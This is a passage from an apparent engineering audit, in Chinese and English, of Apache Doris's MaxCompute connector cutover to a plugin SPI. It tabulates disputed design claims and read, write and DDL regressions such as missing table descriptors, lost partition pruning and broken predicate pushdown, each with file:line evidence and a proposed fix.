fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalTable.java:252-258; fe/fe-connector/.../MaxComputeScanPlanProvider.java:201,316; fe/fe-connector/.../MaxComputeScanRange.java:122; be/src/exec/scan/file_scanner.cpp:1067-1073; be/src/format/table/max_compute_jni_reader.cpp:69-70 | plan-doc/HANDOFF.md:35 | +| read | MC 读路径翻闸后经 SPI(PluginDrivenScanNode)行为不变(golden / 手测)— 验收标准 | 该验收项 box 虽未勾选(故非'声称已完成'),但其措辞'行为不变'预设了读路径与 legacy 等价,只待 golden/手测背书。实测读路径与 legacy 行为有多处实质偏离(凭证/描述符类型、byte_size split size、分区裁剪、datetime 谓词、limit-opt、CAST 下推、IN/NOT IN 取反),'行为不变'的前提不成立。建议把该验收项从'手测确认'升级为'已知偏离清单 + 逐项修复',否则 golden/手测会把 blocker 暴露为'读不出数'而非定位到根因。 | fe/fe-connector/.../MaxComputeScanPlanProvider.java:186-201,221-224,266-316,348-359; fe/fe-connector/.../MaxComputePredicateConverter.java:162-177,254-263; fe/fe-core/.../PluginDrivenExternalTable.java:252-258; fe/fe-core/.../PluginDrivenScanNode.java:586-608 | plan-doc/tasks/P4-maxcompute-migration.md:45 | +| write | 翻闸 PluginDrivenInsertExecutor 的 doBeforeCommit 在 MC(insertHandle==null)路径上被跳过是'正确的'(correctly skipped),且该 restructure '镜像 legacy MCInsertExecutor'。 | 不认同。doBeforeCommit 被跳过会丢掉 legacy MCInsertExecutor.doBeforeCommit():76 中 load-bearing 的一行 `loadedRows = transaction.getUpdateCnt()`。翻闸后 MC INSERT 向客户端/SHOW INSERT RESULT/fe.audit.log returnRows 报告的影响行数恒为 0(数据已正确写入,但 affected rows=0)。根因:MC BE sink 只通过 TMCCommitData.row_count(vmc_partition_writer.cpp:65)与 profile counter(vmc_table_writer.cpp:199)上报行数,从不更新 num_rows_load_success(DPP_NORMAL_ALL),故 AbstractInsertExecutor.java:221-222 取到 0;legacy 在 doBeforeCommit 用 getUpdateCnt 覆盖回真实值,翻闸丢了这一步。设计声称'镜像 legacy'但实际只镜像了 finishInsert 的等价物(connectorTx.commit),漏镜像 loadedRows 赋值。正确修法:在 PluginDrivenInsertExecutor 的 txn-model 分支(或 doBeforeCommit)用 transactionManager.getTransaction(txnId).getUpdateCnt() 回填 loadedRows——该 getUpdateCnt 链路 (PluginDrivenTransaction.java:183-185 / MaxComputeConnectorTransaction.java:158-160) 已实现且无调用方。 | fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/PluginDrivenInsertExecutor.java:146-150; fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/MCInsertExecutor.java:74-78; fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MCTransaction.java:259-261; fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/AbstractInsertExecutor.java:221-222; fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/BaseExternalTableInsertExecutor.java:197,201,203 | plan-doc/tasks/designs/P4-T05-T06-cutover-design.md:114 (W-c: '... → null for MC ⇒ correctly skipped'); 同文 §4.1 W-c :108 ('mirrors legacy MCInsertExecutor') | +| write | cutover 设计的风险表(§6)与 W-c 列举的 dormant→live gap(G1–G5)已穷举翻闸写路径的全部可观察行为差异;loadedRows/affected-rows 不在任何 gap 或风险项中。 | 不认同。设计的 5 个 gap(G1 txn 绑定 / G2 executor restructure / G3 全局注册 / G4 静态分区 / G5 overwrite)与风险表 7 项都聚焦'能否成功写入/能否触发 block-alloc/能否 OVERWRITE',完全没有覆盖'写成功后向用户报告的行数'这一可观察输出。loadedRows 回填缺失是一个独立于 G1–G5 的 gap,被设计遗漏(G2 的描述甚至把跳过 doBeforeCommit 当作正确)。建议在 deviations-log 补登记一条 DV,并在 executor 修复。 | fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/PluginDrivenInsertExecutor.java:146-150 (无 loadedRows 回填) vs fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/MCInsertExecutor.java:76 | plan-doc/tasks/designs/P4-T05-T06-cutover-design.md:36-43 (G1–G5 表), :161-172 (风险表 §6) | +| ddl | T06c 已把 partitions() TVF 的 FE 分发接到 SPI,翻闸后 partitions() TVF 全绿 (HANDOFF 矩阵标 ✅,commit 2cf7dfa81ad '③ partitions TVF PluginDriven 接线') | 不认同。T06c 只接了 MetadataGenerator(BE 取数支路,:1317 dealPluginDrivenCatalog),partitions() TVF 的 FE analyze 入口 PartitionsTableValuedFunction.analyze() 从未接线:catalog allow-list(:172-176)仍只认 MaxComputeExternalCatalog→翻闸后 PluginDrivenExternalCatalog 落空抛 'Catalog of type max_compute is not allowed';且 getTableOrMetaException(:184-185)只允 MAX_COMPUTE_EXTERNAL_TABLE,而 plugin MC 表 type 是 PLUGIN_EXTERNAL_TABLE→即便补 catalog allow-list 仍被表类型挡死。select * from partitions('catalog'='mc',...) 在分析期直接抛错,根本到不了已接好的 BE 取数支路。这是 cutover 真实回归,T06c '已完成'声明在此项不成立。 | fe/fe-core/src/main/java/org/apache/doris/tablefunction/PartitionsTableValuedFunction.java:172-176,184-185 (无 PluginDriven 分支) vs fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalTable.java:62 (type=PLUGIN_EXTERNAL_TABLE) | plan-doc/HANDOFF.md:42,61 | +| ddl | P4-T06c 给 PartitionsTableValuedFunction 加了一个 PluginDrivenExternalCatalog 分支路由到 connector SPI(the actual functionality),Batch D 应删 :173 残留 MaxCompute 分支并 KEEP 新 PluginDriven 分支 | 不认同,且危险。代码里 PartitionsTableValuedFunction.java 根本没有任何 PluginDrivenExternalCatalog 分支(只有 ShowPartitionsCommand 和 MetadataGenerator 被 T06c 加了)。该 Batch D 'amendment' 的前提(T06c 已在此文件加分支)是错的;若按它执行删除 :173 的 MaxComputeExternalCatalog 分支,会删掉该 TVF analyze 的唯一非-Plugin 放行分支,使 partitions() TVF 对 MC 永久不可用——正是 amendment 自称要防止的'permanently break'场景,反而被它自己触发。 | fe/fe-core/src/main/java/org/apache/doris/tablefunction/PartitionsTableValuedFunction.java:173,185 (仅 MaxComputeExternalCatalog/MAX_COMPUTE_EXTERNAL_TABLE,grep 全文无 PluginDrivenExternalCatalog) | plan-doc/tasks/designs/P4-batchD-maxcompute-removal-design.md:70-77,102 | +| ddl | DROP DATABASE FORCE 的 force 语义不复刻是可接受的边界(force 参数丢弃,'若日后需级联→连接器侧增强,记 OQ') | 不认同其'可接受'定级。legacy DROP DATABASE x FORCE 先列出库内远端表逐个 drop 再删库;翻闸把 force 完全忽略,直发 SDK schemas().delete。ODPS 常拒绝删除非空 schema,故 legacy FORCE 成功而翻闸 FORCE 失败/留残表——这是用户可见的 DDL 语义回归(major),不应在 §5 一笔带过当作既有限制。 | fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java:325,335 + fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorMetadata.java:366-371 vs fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeMetadataOps.java:142-155 | plan-doc/tasks/designs/P4-T06c-fe-dispatch-wiring-design.md:185 | +| ddl | T06c 翻闸后回归矩阵只列 5 项 FAIL(DROP TABLE / CREATE DB / DROP DB / SHOW PARTITIONS / partitions TVF),且这 5 项已由 T06c 全部修复;CREATE TABLE 标 ✅ PASS | 矩阵不完整。无 ENGINE 子句的 CREATE TABLE 在分析期 paddingEngineName(CreateTableInfo:912)就抛 'Current catalog does not support create table',根本到不了 PluginDrivenExternalCatalog.createTable override。矩阵把 CREATE TABLE 一律标 ✅ PASS,漏了'不写 ENGINE 的 CREATE TABLE'这一 legacy 可用、翻闸即坏的子场景(legacy 时 catalog 是 MaxComputeExternalCatalog,命中 :912 自动补 engineName=maxcompute)。这是 T06c 范围外、HANDOFF 与设计均未识别的 blocker 级回归。 | fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/info/CreateTableInfo.java:896-917 + fe/fe-core/src/main/java/org/apache/doris/datasource/CatalogFactory.java:52,112 | plan-doc/HANDOFF.md:25-45 + plan-doc/tasks/designs/P4-T06c-fe-dispatch-wiring-design.md:15-22 | +| ddl | 翻闸后 CREATE/DROP TABLE 分区内省用本地名经连接器'内部解析 remote 映射'(T06c 设计假定 getTableHandle 传本地名、连接器内部解析,对齐 PluginDrivenExternalCatalog.tableExist 行为) | 不认同。连接器 MaxComputeConnectorMetadata 并不做 local→remote 名解析:getTableHandle(:104)、createTable(:285-286)、dropTable(:346-347)都把传入的 dbName/tableName 原样喂给 structureHelper→ODPS SDK。legacy 始终先 db.getRemoteName()/dorisTable.getRemoteDbName() 解析回远端真名。当 lower_case_meta_names/lower_case_database_names/meta_names_mapping 生效(本地名≠远端名)时,翻闸会用错误大小写/映射后的名字寻址 ODPS。设计把这标为'验证项'但其假定与代码相反。 | fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorMetadata.java:104,285-286,346-347 vs fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeMetadataOps.java:179,219,266-267 + fe/fe-core/src/main/java/org/apache/doris/datasource/ExternalCatalog.java:549-564,914 | plan-doc/tasks/designs/P4-T06c-fe-dispatch-wiring-design.md:187 | +| replay | DROP DATABASE FORCE 的级联删表语义丢弃属「已知语义差 / 边界(fail loud)」,非问题,仅需「记 OQ,连接器侧日后增强」。 | 这是可观察的功能回归,不应仅以「边界/记 OQ」轻描淡写。翻闸前 DROP DATABASE FORCE 对非空 MaxCompute 库会先逐表 remote-drop 再删库;翻闸后 force 被静默丢弃、连接器 dropDatabase 零级联,且 SPI dropDatabase 无 force 参数 → 对非空库的 DROP ... FORCE 行为改变(要么连接器/远端拒删非空库,要么残留表)。除非确证 MaxCompute 远端 dropDb 自带级联,否则即回归,应升级处理而非接受。 | fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorMetadata.java:366-371 (dropDatabase 只调 structureHelper.dropDb,无表级联); fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java:335 (只传 ifExists,force 不传); fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeMetadataOps.java:142-156 (legacy force==true 逐表 remote-drop) | plan-doc/tasks/designs/P4-T06c-fe-dispatch-wiring-design.md:57 (非目标: FORCE 语义增强不在 T06c), :111, :185 (§5: force 不传 / legacy force 级联删表逻辑不复刻 / 若日后需级联 → 连接器侧增强(记 OQ)) | +| replay | (隐含)T06c「缓存失效全对齐 A1」已使翻闸 DDL 路径与 legacy 行为完全对齐。 | 对齐了「是否失效」与 master/follower parity,但未对齐 master 侧 editlog 写入与 cache 失效的执行顺序:legacy 是 先失效后写 editlog,翻闸是 先写 editlog 后失效。虽判定无可观察回归(同 FE 本地同步、editlog 为本地 journal 追加),但「完全对齐 legacy 行为」的措辞不严谨——存在未记录的副作用顺序反转,应在设计/文档中显式声明(Rule 12 fail loud)。 | fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java:279-283,310-311,339-340,371-372 (四 op 均 logX 先、失效后); fe/fe-core/src/main/java/org/apache/doris/datasource/operations/ExternalMetadataOps.java:47-53,78-81,92-98,105-108 (legacy 先 afterX 失效); fe/fe-core/src/main/java/org/apache/doris/datasource/ExternalCatalog.java:1008-1012 (legacy metadataOps.createDb 先于 logCreateDb) | plan-doc/tasks/designs/P4-T06c-fe-dispatch-wiring-design.md:197 (§6 决策 A1「与 legacy 完全对齐」); plan-doc/HANDOFF.md:18 (A1 全对齐) | +| cache | P4-T06c 已把 partitions() TVF 的 FE 分发接到 PluginDriven SPI(PartitionsTableValuedFunction 加 PluginDrivenExternalCatalog 分支) | 证伪。T06c TVF commit 2cf7dfa81ad 只改了 MetadataGenerator.java(BE 侧数据 handler dealPluginDrivenCatalog),从未触碰 PartitionsTableValuedFunction.java。该文件 analyze() 网关(:172-176 catalog 类型 allow-list、:184-185 table 类型校验)仍只认 internal/HMS/MaxCompute,翻闸后 max_compute catalog 是 PluginDrivenExternalCatalog/PLUGIN_EXTERNAL_TABLE → 构造器 :149 eager analyze 即抛 AnalysisException。dealPluginDrivenCatalog 是不可达死代码。partitions() TVF 对翻闸后 MC 仍 100% FAIL,T06c 未修复此项。 | fe/fe-core/src/main/java/org/apache/doris/tablefunction/PartitionsTableValuedFunction.java:172-176,184-185,149 (无 PluginDriven 分支/import); git show --stat 2cf7dfa81ad (仅 MetadataGenerator.java + test); fe/fe-core/src/main/java/org/apache/doris/tablefunction/MetadataGenerator.java:1359-1377 (handler 存在但不可达) | plan-doc/tasks/designs/P4-batchD-maxcompute-removal-design.md:72 (『P4-T06c adds a PluginDrivenExternalCatalog branch』to PartitionsTableValuedFunction :173/:200); P4-T06c-fe-dispatch-wiring-design.md:253 §9 step6 [x]; HANDOFF.md:61 commit ③ | +| cache | 翻闸后 SHOW PARTITIONS 对 MaxCompute(PluginDriven)分区表可用(T06c 已接线,live 目标全绿) | 部分证伪。T06c 修了 allow-list(:208)+表类型校验(:261)+dispatch(:461)+handler(:312),但漏了 analyze() :263-266 的 table.isPartitionedTable() 门。PluginDrivenExternalTable 未 override isPartitionedTable()(TableIf default=false),故对真实分区的 MC 表,SHOW PARTITIONS 在 analyze :265 先抛『is not a partitioned table』,根本走不到新 handler。新 handler 对分区表成死代码。T06c 自己的设计 §4.3:162 把 isPartitionedTable 标为『验证项』却未实现,commit ②/HANDOFF 仍标全绿。 | fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalTable.java:52-260 (无 isPartitionedTable override); fe/fe-core/src/main/java/org/apache/doris/catalog/TableIf.java:364-366 (default false); fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/ShowPartitionsCommand.java:263-266 (isPartitionedTable 校验), :446→:461 (analyze 先于 dispatch) | plan-doc/tasks/designs/P4-T06c-fe-dispatch-wiring-design.md:252 §9 step5 [x] + :162 (isPartitionedTable 列『验证项』未落实); HANDOFF.md:60 commit ②, :20 (『C 翻闸功能已补齐』) | +| cache | 翻闸后 SELECT 含分区裁剪 PASS(读路径已通),与 legacy 等价 | 需加 caveat:读结果正确性可通,但 legacy 的 FE 侧内部分区裁剪(supportInternalPartitionPruned=true→initSelectedPartitions 走裁剪分支)+ partition_values 二级 cache 在翻闸路径上被彻底丢弃。PluginDrivenExternalTable 不 override 任何分区 API → initSelectedPartitions NOT_PRUNED、分区筛选全下沉到 connector 每查询直连 ODPS 列举。这不是纯等价『读已通』,而是 FE 侧裁剪能力 + 分区清单缓存的回归(每次扫描多一次 ODPS round-trip,partition_values cache 成死代码)。历史矩阵把此项简单标 PASS,掩盖了缓存/裁剪维度的退化。 | fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalTable.java:52-260 (无 supportInternalPartitionPruned/getNameToPartitionItems override); fe/.../maxcompute/MaxComputeExternalTable.java:83,92,100 (legacy 全 override); fe/fe-connector/fe-connector-maxcompute/.../MaxComputeConnectorMetadata.java:196-215 (no connector-side cache) | plan-doc/HANDOFF.md:35 (矩阵『SELECT(含分区裁剪) ✅ PASS』); plan-doc/deviations-log.md:129 (DV-007 只谈 hudi listPartitions* 死代码,未覆盖 MC 翻闸丢裁剪) | + +## 逐路径发现 + +### 路径1 — 读取 (SELECT / 分区裁剪 / schema / split / 类型映射 / 投影下推) + +| id | severity | title | evidence (翻闸 / legacy) | legacy-diff | regression | adversarial-verdict | recommendation | +|---|---|---|---|---|---|---|---| +| READ-P1 | blocker | PluginDriven MaxCompute toThrift sends SCHEMA_TABLE without TMCTable; BE casts to MaxComputeTableDescriptor → wrong/garbage credentials, no auth | 翻闸 fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalTable.java:249-258 (buildTableDescriptor returns null → generic fallback TTableType.SCHEMA_TABLE); fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorMetadata.java (no buildTableDescriptor override → ConnectorTableOps.java:146-151 default returns null); be/src/exec/scan/file_scanner.cpp:1067-1073; be/src/runtime/descriptors.cpp:635-636,653-654
legacy fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeExternalTable.java:305-322 (toThrift builds TMCTable with properties/endpoint/project/quota/table and sets TTableType.MAX_COMPUTE_TABLE) | Legacy emits a MAX_COMPUTE_TABLE descriptor carrying TMCTable(endpoint, quota, project, table, properties incl. mc.access_key/mc.secret_key). The cutover path emits a generic SCHEMA_TABLE descriptor with NO TMCTable. BE's file_scanner.cpp unconditionally static_casts _real_tuple_desc->table_desc() to MaxComputeTableDescriptor* when table_format_type=="max_compute" (which MaxComputeScanRange always sets), but DescriptorTbl::create built a SchemaTableDescriptor (TTableType.SCHEMA_TABLE), so the cast is UB and endpoint/quota/project/table/credentials are all absent/garbage. | yes | ✅存活 (3✓/0✗ of 3) | 修. MaxComputeConnectorMetadata must override buildTableDescriptor to construct a TMCTable (endpoint/quota/project/table/properties from connector props) and set TTableType.MAX_COMPUTE_TABLE, mirroring legacy MaxComputeExternalTable.toThrift(). Without it the read path cannot work at all. | +| READ-P2 | blocker | byte_size splits send size=splitByteSize instead of -1; BE mis-classifies them as ROW_OFFSET → corrupt reads (default split strategy) | 翻闸 fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeScanPlanProvider.java:266-275 (.length(splitByteSize)); fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeScanRange.java:120-122 (rangeDesc.setSize(getLength()))
legacy fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/source/MaxComputeScanNode.java:657-662 (new MaxComputeSplit(BYTE_SIZE_PATH, splitIndex, -1, splitByteSize,...) → length=-1) and 151-153 (setSize(getLength())=-1) | Legacy byte_size split sets the split length to -1 (the splitByteSize goes into fileLength, unused by BE), so rangeDesc.size = -1. The cutover sets rangeDesc.size = splitByteSize. BE (MaxComputeJniScanner.java:121-129) uses split_size==-1 to select SplitType.BYTE_SIZE (IndexedInputSplit) vs row_offset (RowRangeInputSplit). With size=splitByteSize the BE treats a byte-size split as a row-offset split: open() builds new RowRangeInputSplit(sessionId, startOffset=splitIndex, rowCount=splitByteSize). | yes | ✅存活 (3✓/0✗ of 3) | 修. For byte_size splits the connector must emit rangeDesc.size = -1 (set length=-1 and carry splitByteSize separately, or special-case populateRangeParams by split_type) to preserve the -1 sentinel the BE relies on to pick IndexedInputSplit. | +| READ-C1 | blocker | 翻闸 MaxCompute 读取生成 SCHEMA_TABLE 描述符,BE 端 static_cast 到 MaxComputeTableDescriptor 形成类型混淆,读路径整体不可用 | 翻闸 fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorMetadata.java (未 override buildTableDescriptor); fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorTableOps.java:146-151 (默认返回 null); fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalTable.java:240-259 (null→fallback new TTableDescriptor(..., TTableType.SCHEMA_TABLE, ...)); be/src/exec/scan/file_scanner.cpp:1067-1078; be/src/runtime/descriptors.cpp:635-636,653-654
legacy fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeExternalTable.java:305-322 (toThrift 构造 TTableType.MAX_COMPUTE_TABLE + setMcTable(TMCTable: properties/endpoint/project/quota/table)); be/src/runtime/descriptors.h:230-261 | legacy toThrift 产出 MAX_COMPUTE_TABLE 描述符并塞入 TMCTable(endpoint/quota/project/table/properties),BE 据此 new MaxComputeTableDescriptor 提供给 JNI scanner 的 endpoint/access_key/project 等连接信息;翻闸侧 MC connector 未 override buildTableDescriptor,PluginDrivenExternalTable.toThrift 走 null 兜底产出 SCHEMA_TABLE 描述符且无 TMCTable。BE descriptor 工厂据 SCHEMA_TABLE new 出 SchemaTableDescriptor,而 file_scanner.cpp:1069 在 table_format_type=="max_compute" 时无条件 static_cast(table_desc()),对 SchemaTableDescriptor* 是非法向下转型(类型混淆),后续读 mc_desc->endpoint()/quota()/project()/properties() 为越界/错误内存。 | yes | ✅存活 (3✓/0✗ of 3) | 修(blocker):MaxComputeConnectorMetadata 必须 override buildTableDescriptor,产出 TTableType.MAX_COMPUTE_TABLE 并 setMcTable(填 endpoint/quota/project/table/properties,含 time_zone),与 legacy MaxComputeExternalTable.toThrift 等价。否则翻闸后 MC 读取在 BE 端类型混淆,必崩或返回错误数据。建议补一条端到端 SELECT 回归。 | +| READ-C2 | blocker | 翻闸侧分区裁剪缺失:planScan 永远传空 requiredPartitions,且 PluginDrivenExternalTable 不支持 internal partition pruning,分区表退化为整表扫(或仅依赖易失败的 ODPS filter) | 翻闸 fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeScanPlanProvider.java:198-201,314-316 (createReadSession 第4参 requiredPartitions 恒为 Collections.emptyList()); fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalTable.java (未 override supportInternalPartitionPruned/getPartitionColumns/getNameToPartitionItems); fe/fe-core/src/main/java/org/apache/doris/nereids/glue/translator/PhysicalPlanTranslator.java:753-758 (PluginDrivenScanNode.create 不传 selectedPartitions)
legacy fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/source/MaxComputeScanNode.java:718-731,247-251 (用 selectedPartitions.selectedPartitions 构造 requiredPartitionSpecs 传入 createTableBatchReadSession→requiredPartitions); fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeExternalTable.java:82-114 (supportInternalPartitionPruned=true + getNameToPartitionItems); fe/fe-core/src/main/java/org/apache/doris/nereids/glue/translator/PhysicalPlanTranslator.java:795-797 (legacy 传 fileScan.getSelectedPartitions()) | legacy:分区表用 Nereids internal partition pruning 得到 selectedPartitions,经 PhysicalPlanTranslator 传入 MaxComputeScanNode,再以 requiredPartitions 显式限定 ODPS read session 只读选中分区(主裁剪手段);filterPredicate 为辅。翻闸:PluginDrivenExternalTable 未声明 supportInternalPartitionPruned→initSelectedPartitions 返回 NOT_PRUNED,且 create() 不传 selectedPartitions,connector planScan 又恒传 emptyList requiredPartitions。于是翻闸侧完全不走 requiredPartitions,只能靠把分区谓词转成 ODPS filterPredicate 来裁剪;而 MaxComputePredicateConverter.convert 对任一子表达式转换失败即整体回退 NO_PREDICATE(MaxComputePredicateConverter.java:84-89 + convertAnd 132-135 无 per-child catch),导致复杂 WHERE 时分区裁剪彻底失效→整表扫。 | yes | ✅存活 (3✓/0✗ of 3) | 修:要么让 PluginDrivenExternalTable override supportInternalPartitionPruned/getPartitionColumns/getNameToPartitionItems 并在 create() 透传 selectedPartitions→SPI planScan 接收 requiredPartitions;要么至少保证 connector 侧把分区谓词单独、稳健地转成 requiredPartitions。当前实现对大分区表是回归。 | +| READ-P3 | major | Partition pruning entirely lost: PluginDrivenExternalTable reports no partition columns AND connector always passes requiredPartitions=emptyList → full-table scans | 翻闸 fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalTable.java (no override of supportInternalPartitionPruned/getPartitionColumns/getNameToPartitionItems → ExternalTable.java:457-480 defaults: false/empty/empty); fe/fe-core/src/main/java/org/apache/doris/nereids/glue/translator/PhysicalPlanTranslator.java:756-758 (PluginDrivenScanNode.create takes no SelectedPartitions); fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeScanPlanProvider.java:201,316 (requiredPartitions=Collections.emptyList())
legacy fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeExternalTable.java:83-114 (supportInternalPartitionPruned=true, getPartitionColumns, getNameToPartitionItems); fe/fe-core/src/main/java/org/apache/doris/nereids/glue/translator/PhysicalPlanTranslator.java:796-797 (new MaxComputeScanNode(..., fileScan.getSelectedPartitions(),...)); fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/source/MaxComputeScanNode.java:718-731,739 (passes pruned requiredPartitionSpecs from selectedPartitions into createTableBatchReadSession) | Legacy supports internal partition pruning: the planner computes SelectedPartitions, the scan node short-circuits to zero splits when nothing is selected, and passes the explicit pruned PartitionSpec list to ODPS requiredPartitions(). The cutover reports no partition columns (so SelectedPartitions stays NOT_PRUNED, no Doris-side pruning), and the connector hard-codes requiredPartitions=emptyList() (= read ALL partitions per the legacy semantics comment). The only data reduction left is ODPS withFilterPredicate for predicates that successfully convert. | yes | ✅存活 (3✓/0✗ of 3) | 修 (or explicitly accept as a documented perf deviation). At minimum PluginDrivenExternalTable should override getPartitionColumns/getNameToPartitionItems/supportInternalPartitionPruned via the SPI, and the scan path should forward the pruned partition list to planScan so the connector can call requiredPartitions(prunedSpecs). Otherwise large partitioned MaxCompute tables regress to full scans. | +| READ-P4 | major | DATETIME/TIMESTAMP predicate pushdown broken in connector: LocalDateTime.toString() fails the DATETIME_3/6 formatter parse → predicate silently dropped (also wrong tz source) | 翻闸 fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputePredicateConverter.java:227-245,254-263,84-89 (convert catches exception → NO_PREDICATE); fe/fe-core/src/main/java/org/apache/doris/datasource/ExprToConnectorExpressionConverter.java:315-320 (datetime literal carried as java.time.LocalDateTime)
legacy fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/source/MaxComputeScanNode.java:558-593,602-613 (DATETIME via dateLiteral.getStringValue(createDatetimeV2Type(3)) = "yyyy-MM-dd HH:mm:ss.SSS", source zone = DateUtils.getTimeZone() = session time_zone) | Legacy formats the datetime literal with getStringValue(DatetimeV2(3/6)) producing 'yyyy-MM-dd HH:mm:ss.SSS', then converts from the SESSION time zone to UTC and pushes a RawPredicate. The connector receives the literal as a java.time.LocalDateTime; formatLiteralValue does String.valueOf(ldt) = ISO-8601 ('2023-02-02T00:00' / 'T00:00:00'), then convertDateTimezone parses it with DateTimeFormatter 'yyyy-MM-dd HH:mm:ss.SSS' which throws (wrong separator/missing fraction) → convert() swallows it → Predicate.NO_PREDICATE. Net: datetime/timestamp predicates are NOT pushed to ODPS. Separately, even if parsing succeeded, the source zone is MCConnectorEndpoint.resolveProjectTimeZone(endpoint) (region-derived, default systemDefault) instead of the session time_zone — a second divergence. | yes | ✅存活 (3✓/0✗ of 3) | 修. Format the datetime literal to the 'yyyy-MM-dd HH:mm:ss.SSS'/'.SSSSSS' pattern before convertDateTimezone (don't rely on LocalDateTime.toString()), and source the conversion zone from the session time zone (carried via ConnectorSession) to match legacy DateUtils.getTimeZone(), not the endpoint region. | +| READ-P5 | major | LIMIT single-split optimization applied unconditionally (ignores enable_mc_limit_split_optimization session var, default off) | 翻闸 fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeScanPlanProvider.java:186-196,302-346 (useLimitOpt = limit>0 && (onlyPartitionEquality\|\|!filter.isPresent()), and checkOnlyPartitionEquality is a stub returning false at line 352-359)
legacy fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/source/MaxComputeScanNode.java:735-737 (gated on sessionVariable.enableMcLimitSplitOptimization && onlyPartitionEqualityPredicate && hasLimit()); fe/fe-core/src/main/java/org/apache/doris/qe/SessionVariable.java:2908 (enableMcLimitSplitOptimization=false default) | Legacy only takes the single-split limit path when the session var enable_mc_limit_split_optimization is ON (default OFF) AND the filter is only partition-equality AND there is a limit. The connector has no access to the session var and applies the single-split path whenever limit>0 and there is no filter — i.e. by default for every unfiltered LIMIT query. Conversely, when a partition-equality filter is present and the var is ON, legacy would use limit-opt but the connector never does (its onlyPartitionEquality stub is always false). | yes | ✅存活 (3✓/0✗ of 3) | 待定/修. Thread the enable_mc_limit_split_optimization flag (and the real onlyPartitionEquality check) through ConnectorSession so the connector matches legacy gating, or explicitly document accepting always-on limit-opt. As-is it is an undocumented default behavior divergence. | +| READ-C3 | major | DATETIME/TIMESTAMP 谓词下推的源时区不同:legacy 用会话时区,翻闸用 endpoint region 静态时区,可致下推谓词边界不同→裁剪/过滤结果不同 | 翻闸 fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeScanPlanProvider.java:221-224,227-229 (sourceZone = MCConnectorEndpoint.resolveProjectTimeZone(endpoint)); fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputePredicateConverter.java:254-262 (convertDateTimezone 以 sourceTimeZone 为源); fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MCConnectorEndpoint.java:34-59 (region→ZoneId 静态表)
